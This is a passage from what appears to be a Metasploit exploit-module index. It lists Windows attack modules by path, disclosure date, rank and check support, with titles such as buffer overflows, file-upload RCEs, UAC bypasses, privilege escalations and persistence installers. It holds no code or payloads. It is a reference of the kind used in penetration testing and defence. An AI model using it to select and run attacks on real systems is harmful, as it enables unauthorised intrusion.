No Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow + windows/http/intersystems_cache 2009-09-29 great No InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow + windows/http/intrasrv_bof 2013-05-30 manual Yes Intrasrv 1.0 Buffer Overflow + windows/http/ipswitch_wug_maincfgret 2004-08-25 great No Ipswitch WhatsUp Gold 8.03 Buffer Overflow + windows/http/jira_collector_traversal 2014-02-26 normal Yes JIRA Issues Collector Directory Traversal + windows/http/kaseya_uploader 2015-09-23 excellent Yes Kaseya VSA uploader.aspx Arbitrary File Upload + windows/http/kaseya_uploadimage_file_upload 2013-11-11 excellent Yes Kaseya uploadImage Arbitrary File Upload + windows/http/kolibri_http 2010-12-26 good Yes Kolibri HTTP Server HEAD Buffer Overflow + windows/http/landesk_thinkmanagement_upload_asp 2012-02-15 excellent No LANDesk Lenovo ThinkManagement Console Remote Command Execution + windows/http/lexmark_markvision_gfd_upload 2014-12-09 excellent Yes Lexmark MarkVision Enterprise Arbitrary File Upload + windows/http/mailenable_auth_header 2005-04-24 great Yes MailEnable Authorization Header Buffer Overflow + windows/http/manage_engine_opmanager_rce 2015-09-14 manual Yes ManageEngine OpManager Remote Code Execution + windows/http/manageengine_adshacluster_rce 2018-06-28 excellent Yes Manage Engine Exchange Reporter Plus Unauthenticated RCE + windows/http/manageengine_appmanager_exec 2018-03-07 excellent Yes ManageEngine Applications Manager Remote Code Execution + windows/http/manageengine_apps_mngr 2011-04-08 average No ManageEngine Applications Manager Authenticated Code Execution + windows/http/manageengine_connectionid_write 2015-12-14 excellent Yes ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability + windows/http/maxdb_webdbm_database 2006-08-29 good No MaxDB WebDBM Database Parameter Overflow + windows/http/maxdb_webdbm_get_overflow 2005-04-26 good No MaxDB WebDBM GET Buffer Overflow + windows/http/mcafee_epolicy_source 2006-07-17 average Yes McAfee ePolicy Orchestrator / ProtectionPilot Overflow + windows/http/mdaemon_worldclient_form2raw 2003-12-29 great Yes MDaemon WorldClient form2raw.cgi Stack Buffer Overflow + windows/http/minishare_get_overflow 2004-11-07 average No Minishare 1.4.1 Buffer Overflow + windows/http/miniweb_upload_wbem 2013-04-09 excellent Yes MiniWeb (Build 300) Arbitrary File Upload + windows/http/navicopa_get_overflow 2006-09-28 great Yes NaviCOPA 2.0.1 URL Handling Buffer Overflow + windows/http/netdecision_http_bof 2012-02-24 normal Yes NetDecision 4.5.1 HTTP Server Buffer Overflow + windows/http/netgear_nms_rce 2016-02-04 excellent Yes NETGEAR ProSafe Network Management System 300 Arbitrary File Upload + windows/http/novell_imanager_upload 2010-10-01 excellent No Novell iManager getMultiPartParameters Arbitrary File Upload + windows/http/novell_mdm_lfi 2013-03-13 excellent Yes Novell Zenworks Mobile Managment MDM.php Local File Inclusion Vulnerability + windows/http/novell_messenger_acceptlang 2006-04-13 average No Novell Messenger Server 2.0 Accept-Language Overflow + windows/http/nowsms 2008-02-19 good No Now SMS/MMS Gateway Buffer Overflow + windows/http/octopusdeploy_deploy 2017-05-15 excellent Yes Octopus Deploy Authenticated Code Execution + windows/http/oracle9i_xdb_pass 2003-08-18 great Yes Oracle 9i XDB HTTP PASS Overflow (win32) + windows/http/oracle_beehive_evaluation 2010-06-09 excellent Yes Oracle BeeHive 2 voice-servlet processEvaluation() Vulnerability + windows/http/oracle_beehive_prepareaudiotoplay 2015-11-10 excellent Yes Oracle BeeHive 2 voice-servlet prepareAudioToPlay() Arbitrary File Upload + windows/http/oracle_btm_writetofile 2012-08-07 excellent No Oracle Business Transaction Management FlashTunnelService Remote Code Execution + windows/http/oracle_endeca_exec 2013-07-16 excellent Yes Oracle Endeca Server Remote Command Execution + windows/http/oracle_event_processing_upload 2014-04-21 excellent Yes Oracle Event Processing FileUploadServlet Arbitrary File Upload + windows/http/osb_uname_jlist 2010-07-13 excellent No Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability + windows/http/peercast_url 2006-03-08 average No PeerCast URL Handling Buffer Overflow + windows/http/php_apache_request_headers_bof 2012-05-08 normal No PHP apache_request_headers Function Buffer Overflow + windows/http/privatewire_gateway 2006-06-26 average No Private Wire Gateway Buffer Overflow + windows/http/psoproxy91_overflow 2004-02-20 average Yes PSO Proxy v0.91 Stack Buffer Overflow + windows/http/rabidhamster_r4_log 2012-02-09 normal Yes RabidHamster R4 Log Entry sprintf() Buffer Overflow + windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution + windows/http/sambar6_search_results 2003-06-21 normal Yes Sambar 6 Search Results Buffer Overflow + windows/http/sap_configservlet_exec_noauth 2012-11-01 great Yes SAP ConfigServlet Remote Code Execution + windows/http/sap_host_control_cmd_exec 2012-08-14 average Yes SAP NetWeaver HostControl Command Injection + windows/http/sapdb_webtools 2007-07-05 great No SAP DB 7.4 WebTools Buffer Overflow + windows/http/savant_31_overflow 2002-09-10 great Yes Savant 3.1 Web Server Overflow + windows/http/sepm_auth_bypass_rce 2015-07-31 excellent No Symantec Endpoint Protection Manager Authentication Bypass and Code Execution + windows/http/serviio_checkstreamurl_cmd_exec 2017-05-03 excellent Yes Serviio Media Server checkStreamUrl Command Execution + windows/http/servu_session_cookie 2009-11-01 good Yes Rhinosoft Serv-U Session Cookie Buffer Overflow + windows/http/shoutcast_format 2004-12-23 average Yes SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow + windows/http/shttpd_post 2006-10-06 average No SHTTPD URI-Encoded POST Request Overflow + windows/http/solarwinds_fsm_userlogin 2015-03-13 excellent Yes Solarwinds Firewall Security Manager 6.6.5 Client Session Handling Vulnerability + windows/http/solarwinds_storage_manager_sql 2011-12-07 excellent Yes Solarwinds Storage Manager 5.1.0 SQL Injection + windows/http/sonicwall_scrutinizer_sqli 2012-07-22 excellent Yes Dell SonicWALL (Plixer) Scrutinizer 9 SQL Injection + windows/http/steamcast_useragent 2008-01-24 average Yes Streamcast HTTP User-Agent Buffer Overflow + windows/http/sws_connection_bof 2012-07-20 normal Yes Simple Web Server Connection Header Buffer Overflow + windows/http/sybase_easerver 2005-07-25 average No Sybase EAServer 5.2 Remote Stack Buffer Overflow + windows/http/syncbreeze_bof 2017-03-15 great Yes Sync Breeze Enterprise GET Buffer Overflow + windows/http/sysax_create_folder 2012-07-29 normal No Sysax Multi Server 5.64 Create Folder Buffer Overflow + windows/http/trackercam_phparg_overflow 2005-02-18 average Yes TrackerCam PHP Argument Buffer Overflow + windows/http/trackit_file_upload 2014-10-07 excellent Yes Numara / BMC Track-It! FileStorageService Arbitrary File Upload + windows/http/trendmicro_officescan 2007-06-28 good No Trend Micro OfficeScan Remote Stack Buffer Overflow + windows/http/trendmicro_officescan_widget_exec 2017-10-07 excellent Yes Trend Micro OfficeScan Remote Code Execution + windows/http/ultraminihttp_bof 2013-07-10 normal No Ultra Mini HTTPD Stack Buffer Overflow + windows/http/umbraco_upload_aspx 2012-06-28 excellent No Umbraco CMS Remote Command Execution + windows/http/vmware_vcenter_chargeback_upload 2013-05-15 excellent Yes VMware vCenter Chargeback Manager ImageUploadServlet Arbitrary File Upload + windows/http/vxsrchs_bof 2017-03-15 great Yes VX Search Enterprise GET Buffer Overflow + windows/http/webster_http 2002-12-02 average No Webster HTTP Server GET Buffer Overflow + windows/http/xampp_webdav_upload_php 2012-01-14 excellent No XAMPP WebDAV PHP Upload + windows/http/xitami_if_mod_since 2007-09-24 average Yes Xitami 2.5c2 Web Server If-Modified-Since Overflow + windows/http/zenworks_assetmgmt_uploadservlet 2011-11-02 excellent No Novell ZENworks Asset Management Remote Execution + windows/http/zenworks_uploadservlet 2010-03-30 excellent No Novell ZENworks Configuration Management Remote Execution + windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow + windows/iis/iis_webdav_upload_asp 1994-01-01 excellent No Microsoft IIS WebDAV Write Access Code Execution + windows/iis/ms01_023_printer 2001-05-01 good Yes MS01-023 Microsoft IIS 5.0 Printer Host Header Overflow + windows/iis/ms01_026_dbldecode 2001-05-15 excellent Yes MS01-026 Microsoft IIS/PWS CGI Filename Double Decode Command Execution + windows/iis/ms01_033_idq 2001-06-18 good No MS01-033 Microsoft IIS 5.0 IDQ Path Overflow + windows/iis/ms02_018_htr 2002-04-10 good No MS02-018 Microsoft IIS 4.0 .HTR Path Overflow + windows/iis/ms02_065_msadc 2002-11-20 normal Yes MS02-065 Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow + windows/iis/ms03_007_ntdll_webdav 2003-05-30 great Yes MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow + windows/iis/msadc 1998-07-17 excellent Yes MS99-025 Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution + windows/imap/eudora_list 2005-12-20 great Yes Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow + windows/imap/imail_delete 2004-11-12 average No IMail IMAP4D Delete Overflow + windows/imap/ipswitch_search 2007-07-18 average No Ipswitch IMail IMAP SEARCH Buffer Overflow + windows/imap/mailenable_login 2006-12-11 great No MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow + windows/imap/mailenable_status 2005-07-13 great No MailEnable IMAPD (1.54) STATUS Request Buffer Overflow + windows/imap/mailenable_w3c_select 2005-10-03 great Yes MailEnable IMAPD W3C Logging Buffer Overflow + windows/imap/mdaemon_cram_md5 2004-11-12 great No Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow + windows/imap/mdaemon_fetch 2008-03-13 great Yes MDaemon 9.6.4 IMAPD FETCH Buffer Overflow + windows/imap/mercur_imap_select_overflow 2006-03-17 average No Mercur v5.0 IMAP SP3 SELECT Buffer Overflow + windows/imap/mercur_login 2006-03-17 average No Mercur Messaging 2005 IMAP Login Buffer Overflow + windows/imap/mercury_login 2007-03-06 normal Yes Mercury/32 4.01 IMAP LOGIN SEH Buffer Overflow + windows/imap/mercury_rename 2004-11-29 average Yes Mercury/32 v4.01a IMAP RENAME Buffer Overflow + windows/imap/novell_netmail_append 2006-12-23 average No Novell NetMail IMAP APPEND Buffer Overflow + windows/imap/novell_netmail_auth 2007-01-07 average No Novell NetMail IMAP AUTHENTICATE Buffer Overflow + windows/imap/novell_netmail_status 2005-11-18 average No Novell NetMail IMAP STATUS Buffer Overflow + windows/imap/novell_netmail_subscribe 2006-12-23 average No Novell NetMail IMAP SUBSCRIBE Buffer Overflow + windows/isapi/ms00_094_pbserver 2000-12-04 good Yes MS00-094 Microsoft IIS Phone Book Service Overflow + windows/isapi/ms03_022_nsiislog_post 2003-06-25 good Yes MS03-022 Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow + windows/isapi/ms03_051_fp30reg_chunked 2003-11-11 good Yes MS03-051 Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow + windows/isapi/rsa_webagent_redirect 2005-10-21 good Yes Microsoft IIS ISAPI RSA WebAgent Redirect Overflow + windows/isapi/w3who_query 2004-12-06 good Yes Microsoft IIS ISAPI w3who.dll Query String Overflow + windows/ldap/imail_thc 2004-02-17 average No IMail LDAP Service Buffer Overflow + windows/ldap/pgp_keyserver7 2001-07-16 good No Network Associates PGP KeyServer 7 LDAP Buffer Overflow + windows/license/calicclnt_getconfig 2005-03-02 average No Computer Associates License Client GETCONFIG Overflow + windows/license/calicserv_getconfig 2005-03-02 normal Yes Computer Associates License Server GETCONFIG Overflow + windows/license/flexnet_lmgrd_bof 2012-03-23 normal No FlexNet License Server Manager lmgrd Buffer Overflow + windows/license/sentinel_lm7_udp 2005-03-07 average Yes SentinelLM UDP Buffer Overflow + windows/local/adobe_sandbox_adobecollabsync 2013-05-14 great Yes AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass + windows/local/agnitum_outpost_acs 2013-08-02 excellent Yes Agnitum Outpost Internet Security Local Privilege Escalation + windows/local/alpc_taskscheduler 2018-08-27 normal No Microsoft Windows ALPC Task Scheduler Local Privilege Elevation + windows/local/always_install_elevated 2010-03-18 excellent Yes Windows AlwaysInstallElevated MSI + windows/local/applocker_bypass 2015-08-03 excellent No AppLocker Execution Prevention Bypass + windows/local/ask 2012-01-03 excellent No Windows Escalate UAC Execute RunAs + windows/local/bthpan 2014-07-18 average Yes MS14-062 Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation + windows/local/bypassuac 2010-12-31 excellent No Windows Escalate UAC Protection Bypass + windows/local/bypassuac_comhijack 1900-01-01 excellent Yes Windows Escalate UAC Protection Bypass (Via COM Handler Hijack) + windows/local/bypassuac_eventvwr 2016-08-15 excellent Yes Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key) + windows/local/bypassuac_fodhelper 2017-05-12 excellent Yes Windows UAC Protection Bypass (Via FodHelper Registry Key) + windows/local/bypassuac_injection 2010-12-31 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) + windows/local/bypassuac_injection_winsxs 2017-04-06 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS + windows/local/bypassuac_sluihijack 2018-01-15 excellent Yes Windows UAC Protection Bypass (Via Slui File Handler Hijack) + windows/local/bypassuac_vbs 2015-08-22 excellent No Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability) + windows/local/capcom_sys_exec 1999-01-01 normal Yes Windows Capcom.sys Kernel Execution Exploit (x64 only) + windows/local/current_user_psexec 1999-01-01 excellent No PsExec via Current User Token + windows/local/cve_2017_8464_lnk_lpe 2017-06-13 excellent Yes LNK Code Execution Vulnerability + windows/local/ikeext_service 2012-10-09 good Yes IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL + windows/local/ipass_launch_app 2015-03-12 excellent Yes iPass Mobile Client Service Privilege Escalation + windows/local/lenovo_systemupdate 2015-04-12 excellent Yes Lenovo System Update Privilege Escalation + windows/local/mov_ss 2018-05-08 excellent No Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability + windows/local/mqac_write 2014-07-22 average Yes MQAC.sys Arbitrary Write Privilege Escalation + windows/local/ms10_015_kitrap0d 2010-01-19 great Yes Windows SYSTEM Escalation via KiTrap0D + windows/local/ms10_092_schelevator 2010-09-13 excellent Yes Windows Escalate Task Scheduler XML Privilege Escalation + windows/local/ms11_080_afdjoinleaf 2011-11-30 average No MS11-080 AfdJoinLeaf Privilege Escalation + windows/local/ms13_005_hwnd_broadcast 2012-11-27 excellent No MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation + windows/local/ms13_053_schlamperei 2013-12-01 average Yes Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei) + windows/local/ms13_081_track_popup_menu 2013-10-08 average Yes Windows TrackPopupMenuEx Win32k NULL Page + windows/local/ms13_097_ie_registry_symlink 2013-12-10 great No MS13-097 Registry Symlink IE Sandbox Escape + windows/local/ms14_009_ie_dfsvc 2014-02-11 great Yes MS14-009 .NET Deployment Service IE Sandbox Escape + windows/local/ms14_058_track_popup_menu 2014-10-14 normal Yes Windows TrackPopupMenu Win32k NULL Pointer Dereference + windows/local/ms14_070_tcpip_ioctl 2014-11-11 average Yes MS14-070 Windows tcpip!SetAddrOptions NULL Pointer Dereference + windows/local/ms15_004_tswbproxy 2015-01-13 good Yes MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape + windows/local/ms15_051_client_copy_image 2015-05-12 normal Yes Windows ClientCopyImage Win32k Exploit + windows/local/ms15_078_atmfd_bof 2015-07-11 manual Yes MS15-078 Microsoft Windows Font Driver Buffer Overflow + windows/local/ms16_014_wmi_recv_notif 2015-12-04 normal Yes Windows WMI Recieve Notification Exploit + windows/local/ms16_016_webdav 2016-02-09 excellent Yes MS16-016 mrxdav.sys WebDav Local Privilege Escalation + windows/local/ms16_032_secondary_logon_handle_privesc 2016-03-21 normal Yes MS16-032 Secondary Logon Handle Privilege Escalation + windows/local/ms16_075_reflection 2016-01-16 normal Yes Windows Net-NTLMv2 Reflection DCOM/RPC + windows/local/ms16_075_reflection_juicy 2016-01-16 great Yes Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy) + windows/local/ms18_8120_win32k_privesc 2018-05-09 good No Windows SetImeInfoEx Win32k NULL Pointer Dereference + windows/local/ms_ndproxy 2013-11-27 average Yes MS14-002 Microsoft Windows ndproxy.sys Local Privilege Escalation + windows/local/novell_client_nicm 2013-05-22 average Yes Novell Client 2 SP3 nicm.sys Local Privilege Escalation + windows/local/novell_client_nwfs 2008-06-26 average No Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation + windows/local/ntapphelpcachecontrol 2014-09-30 normal Yes MS15-001 Microsoft Windows NtApphelpCacheControl Improper Authorization Check + windows/local/nvidia_nvsvc 2012-12-25 average Yes Nvidia (nvsvc) Display Driver Service Local Privilege Escalation + windows/local/panda_psevents 2016-06-27 excellent Yes Panda Security PSEvents Privilege Escalation + windows/local/payload_inject 2011-10-12 excellent No Windows Manage Memory Payload Injection + windows/local/persistence 2011-10-19 excellent No Windows Persistent Registry Startup Payload Installer + windows/local/persistence_service 2018-10-20 excellent No Windows Persistent Service Installer + windows/local/powershell_cmd_upgrade 1999-01-01 excellent No Windows Command Shell Upgrade (Powershell) + windows/local/powershell_remoting 1999-01-01 excellent No Powershell Remoting Remote Command Execution + windows/local/ppr_flatten_rec 2013-05-15 average Yes Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation + windows/local/ps_persist 2012-08-14 excellent No Powershell Payload Execution + windows/local/ps_wmi_exec 2012-08-19 excellent No Authenticated WMI Exec via Powershell + windows/local/pxeexploit 2011-08-05 excellent No PXE Exploit Server + windows/local/razer_zwopenprocess 2017-03-22 normal Yes Razer Synapse rzpnk.sys ZwOpenProcess + windows/local/registry_persistence 2015-07-01 excellent Yes Windows Registry Only Persistence + windows/local/run_as 1999-01-01 excellent No Windows Run Command As User + windows/local/s4u_persistence 2013-01-02 excellent No Windows Manage User Level Persistent Payload Installer + windows/local/service_permissions 2012-10-15 great No Windows Escalate Service Permissions Local Privilege Escalation + windows/local/trusted_service_path 2001-10-25 excellent Yes Windows Service Trusted Path Privilege Escalation + windows/local/virtual_box_guest_additions 2014-07-15 average Yes VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation + windows/local/virtual_box_opengl_escape 2014-03-11 average Yes VirtualBox 3D Acceleration Virtual Machine Escape + windows/local/vss_persistence 2011-10-21 excellent No Persistent Payload in Windows Volume Shadow Copy + windows/local/webexec 2018-10-09 good Yes WebEx Local Service Permissions Exploit + windows/local/wmi 1999-01-01 excellent No Windows Management Instrumentation (WMI) Remote Command Execution + windows/local/wmi_persistence 2017-06-06 normal No WMI Event Subscription Persistence + windows/lotus/domino_http_accept_language 2008-05-20 average No IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow + windows/lotus/domino_icalendar_organizer 2010-09-14 normal Yes IBM Lotus Domino iCalendar MAILTO Buffer Overflow + windows/lotus/domino_sametime_stmux 2008-05-21 average Yes IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow + windows/lotus/lotusnotes_lzh 2011-05-24 normal No Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment) + windows/lpd/hummingbird_exceed 2005-05-27 average No Hummingbird Connectivity 10 SP5 LPD Buffer Overflow + windows/lpd/niprint 2003-11-05 good No NIPrint LPD Request Overflow + windows/lpd/saplpd 2008-02-04 good No SAP SAPLPD 6.28 Buffer Overflow + windows/lpd/wincomlpd_admin 2008-02-04 good No WinComLPD Buffer Overflow + windows/misc/achat_bof 2014-12-18 normal No Achat Unicode SEH Buffer Overflow + windows/misc/actfax_raw_server_bof 2013-02-05 normal No ActFax 5.01 RAW Server Buffer Overflow + windows/misc/agentxpp_receive_agentx 2010-04-16 good No AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow + windows/misc/allmediaserver_bof 2012-07-04 normal No ALLMediaServer 0.8 Buffer Overflow + windows/misc/altiris_ds_sqli 2008-05-15 normal Yes Symantec Altiris DS SQL Injection + windows/misc/apple_quicktime_rtsp_response 2007-11-23 normal No Apple QuickTime 7.3 RTSP Response Header Buffer Overflow + windows/misc/asus_dpcproxy_overflow 2008-03-21 average No Asus Dpcproxy Buffer Overflow + windows/misc/avaya_winpmd_unihostrouter 2011-05-23 normal No Avaya WinPMD UniteHostRouter Buffer Overflow + windows/misc/avidphoneticindexer 2011-11-29 normal No Avid Media Composer 5.5 - Avid Phonetic Indexer Buffer Overflow + windows/misc/bakbone_netvault_heap 2005-04-01 average Yes BakBone NetVault Remote Heap Overflow + windows/misc/bcaaa_bof 2011-04-04 good No Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow + windows/misc/bigant_server 2008-04-15 average No BigAnt Server 2.2 Buffer Overflow + windows/misc/bigant_server_250 2008-04-15 great No BigAnt Server 2.50 SP1 Buffer Overflow + windows/misc/bigant_server_dupf_upload 2013-01-09 excellent No BigAnt Server DUPF Command Arbitrary File Upload + windows/misc/bigant_server_sch_dupf_bof 2013-01-09 normal No BigAnt Server 2 SCH And DUPF Buffer Overflow + windows/misc/bigant_server_usv 2009-12-29 great No BigAnt Server 2.52 USV Buffer Overflow + windows/misc/bomberclone_overflow 2006-02-16 average No Bomberclone 0.11.6 Buffer Overflow + windows/misc/bopup_comm 2009-06-18 good No Bopup Communications Server Buffer Overflow + windows/misc/borland_interbase 2007-07-24 average No Borland Interbase Create-Request Buffer Overflow + windows/misc/borland_starteam 2008-04-02 average No Borland CaliberRM StarTeam Multicast Service Buffer Overflow + windows/misc/citrix_streamprocess 2011-01-20 good No Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow + windows/misc/citrix_streamprocess_data_msg 2011-11-04 normal No Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow + windows/misc/citrix_streamprocess_get_boot_record_request 2011-11-04 normal No Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020004 Buffer Overflow + windows/misc/citrix_streamprocess_get_footer 2011-11-04 normal No Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020002 Buffer Overflow + windows/misc/citrix_streamprocess_get_objects 2011-11-04 normal No Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020006 Buffer Overflow + windows/misc/cloudme_sync 2018-01-17 great No CloudMe Sync v1.10.9 + windows/misc/commvault_cmd_exec 2017-12-12 good No Commvault Communications Service (cvd) Command Injection + windows/misc/disk_savvy_adm 2017-01-31 great No Disk Savvy Enterprise v10.4.18 + windows/misc/doubletake 2008-06-04 average No DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow + windows/misc/eiqnetworks_esa 2006-07-24 average No eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow + windows/misc/eiqnetworks_esa_topology 2006-07-25 average No eIQNetworks ESA Topology DELETEDEVICE Overflow + windows/misc/enterasys_netsight_syslog_bof 2011-12-19 normal No Enterasys NetSight nssyslogd.exe Buffer Overflow + windows/misc/eureka_mail_err 2009-10-22 normal No Eureka Email 2.2q ERR Remote Buffer Overflow + windows/misc/fb_cnct_group 2013-01-31 normal Yes Firebird Relational Database CNCT Group Number Buffer Overflow + windows/misc/fb_isc_attach_database 2007-10-03 average No Firebird Relational Database isc_attach_database() Buffer Overflow + windows/misc/fb_isc_create_database 2007-10-03 average No Firebird Relational Database isc_create_database() Buffer Overflow + windows/misc/fb_svc_attach 2007-10-03 average No Firebird Relational Database SVC_attach() Buffer Overflow + windows/misc/gh0st 2017-07-27 normal Yes Gh0st Client buffer Overflow + windows/misc/gimp_script_fu 2012-05-18 normal No GIMP script-fu Server Buffer Overflow + windows/misc/hp_dataprotector_cmd_exec 2014-11-02 excellent Yes HP Data Protector 8.10 Remote Command Execution + windows/misc/hp_dataprotector_crs 2013-06-03 normal Yes HP Data Protector Cell Request Service Buffer Overflow + windows/misc/hp_dataprotector_dtbclslogin 2010-09-09 normal Yes HP Data Protector DtbClsLogin Buffer Overflow + windows/misc/hp_dataprotector_encrypted_comms 2016-04-18 normal Yes HP Data Protector Encrypted Communication Remote Command Execution + windows/misc/hp_dataprotector_exec_bar 2014-01-02 excellent Yes HP Data Protector Backup Client Service Remote Code Execution + windows/misc/hp_dataprotector_install_service 2011-11-02 excellent Yes HP Data Protector 6.10/6.11/6.20 Install Service + windows/misc/hp_dataprotector_new_folder 2012-03-12 normal No HP Data Protector Create New Folder Buffer Overflow + windows/misc/hp_dataprotector_traversal 2014-01-02 great Yes HP Data Protector Backup Client Service Directory Traversal + windows/misc/hp_imc_dbman_restartdb_unauth_rce 2017-05-15 excellent Yes HPE iMC dbman RestartDB Unauthenticated RCE + windows/misc/hp_imc_dbman_restoredbase_unauth_rce 2017-05-15 excellent Yes HPE iMC dbman RestoreDBase Unauthenticated RCE + windows/misc/hp_imc_uam 2012-08-29 normal No HP Intelligent Management Center UAM Buffer Overflow + windows/misc/hp_loadrunner_magentproc 2013-07-27 normal No HP LoadRunner magentproc.exe Overflow + windows/misc/hp_loadrunner_magentproc_cmdexec 2010-05-06 excellent No HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution + windows/misc/hp_magentservice 2012-01-12 average No HP Diagnostics Server magentservice.exe Overflow + windows/misc/hp_omniinet_1 2009-12-17 great Yes HP OmniInet.exe MSG_PROTOCOL Buffer Overflow + windows/misc/hp_omniinet_2 2009-12-17 great Yes HP OmniInet.exe MSG_PROTOCOL Buffer Overflow + windows/misc/hp_omniinet_3 2011-06-29 great Yes HP OmniInet.exe Opcode 27 Buffer Overflow + windows/misc/hp_omniinet_4 2011-06-29 good No HP OmniInet.exe Opcode 20 Buffer Overflow + windows/misc/hp_operations_agent_coda_34 2012-07-09 normal Yes HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow + windows/misc/hp_operations_agent_coda_8c 2012-07-09 normal Yes HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow + windows/misc/hp_ovtrace 2007-08-09 average No HP OpenView Operations OVTrace Buffer Overflow + windows/misc/hta_server 2016-10-06 manual No HTA Web Server + windows/misc/ib_isc_attach_database 2007-10-03 good No Borland InterBase isc_attach_database() Buffer Overflow + windows/misc/ib_isc_create_database 2007-10-03 good No Borland InterBase isc_create_database() Buffer Overflow + windows/misc/ib_svc_attach 2007-10-03 good No Borland InterBase SVC_attach() Buffer Overflow + windows/misc/ibm_cognos_tm1admsd_bof 2012-04-02 normal No IBM Cognos tm1admsd.exe Overflow + windows/misc/ibm_director_cim_dllinject 2009-03-10 excellent Yes IBM System Director Agent DLL Injection + windows/misc/ibm_tsm_cad_ping 2009-11-04 good No IBM Tivoli Storage Manager Express CAD Service Buffer Overflow + windows/misc/ibm_tsm_rca_dicugetidentify 2009-11-04 great No IBM Tivoli Storage Manager Express RCA Service Buffer Overflow + windows/misc/ibm_websphere_java_deserialize 2015-11-06 excellent No IBM WebSphere RCE Java Deserialization Vulnerability + windows/misc/itunes_extm3u_bof 2012-06-21 normal No Apple iTunes 10 Extended M3U Stack Buffer Overflow + windows/misc/landesk_aolnsrvr 2007-04-13 average No LANDesk Management Suite 8.7 Alert Service Buffer Overflow + windows/misc/lianja_db_net 2013-05-22 normal Yes Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow + windows/misc/manageengine_eventlog_analyzer_rce 2015-07-11 manual Yes ManageEngine EventLog Analyzer Remote Code Execution + windows/misc/mercury_phonebook 2005-12-19 average No Mercury/32 PH Server Module Buffer Overflow + windows/misc/mini_stream 2009-12-25 normal No Mini-Stream 3.0.1.1 Buffer Overflow + windows/misc/mirc_privmsg_server 2008-10-02 normal No mIRC PRIVMSG Handling Stack Buffer Overflow + windows/misc/ms07_064_sami 2007-12-11 normal No MS07-064 Microsoft DirectX DirectShow SAMI Buffer Overflow + windows/misc/ms10_104_sharepoint 2010-12-14 excellent Yes MS10-104 Microsoft Office SharePoint Server 2007 Remote Code Execution + windows/misc/netcat110_nt 2004-12-27 great No Netcat v1.10 NT Stack Buffer Overflow + windows/misc/nettransport 2010-01-02 normal No NetTransport Download Manager 2.90.510 Buffer Overflow + windows/misc/nvidia_mental_ray 2013-12-10 excellent No Nvidia Mental Ray Satellite Service Arbitrary DLL Injection + windows/misc/plugx 2017-07-27 normal Yes PlugX Controller Stack Overflow + windows/misc/poisonivy_21x_bof 2016-06-03 normal Yes Poison Ivy 2.1.x C2 Buffer Overflow + windows/misc/poisonivy_bof 2012-06-24 normal Yes Poison Ivy Server Buffer Overflow + windows/misc/poppeeper_date 2009-02-27 normal No POP Peeper v3.4 DATE Buffer Overflow + windows/misc/poppeeper_uidl 2009-02-27 normal No POP Peeper v3.4 UIDL Buffer Overflow + windows/misc/realtek_playlist 2008-12-16 great No Realtek Media Player Playlist Buffer Overflow + windows/misc/sap_2005_license 2009-08-01 great No SAP Business One License Manager 2005 Buffer Overflow + windows/misc/sap_netweaver_dispatcher 2012-05-08 normal No SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow + windows/misc/shixxnote_font 2004-10-04 great No ShixxNOTE 6.net Font Field Overflow + windows/misc/solidworks_workgroup_pdmwservice_file_write 2014-02-22 good Yes SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write + windows/misc/splayer_content_type 2011-05-04 normal No SPlayer 3.7 Content-Type Buffer Overflow + windows/misc/stream_down_bof 2011-12-27 good No CoCSoft StreamDown 6.8.0 Buffer Overflow + windows/misc/talkative_response 2009-03-17 normal No Talkative IRC v0.4.4.16 Response Buffer Overflow + windows/misc/tiny_identd_overflow 2007-05-14 average No TinyIdentD 2.2 Stack Buffer Overflow + windows/misc/trendmicro_cmdprocessor_addtask 2011-12-07 good No TrendMicro Control Manger CmdProcessor.exe Stack 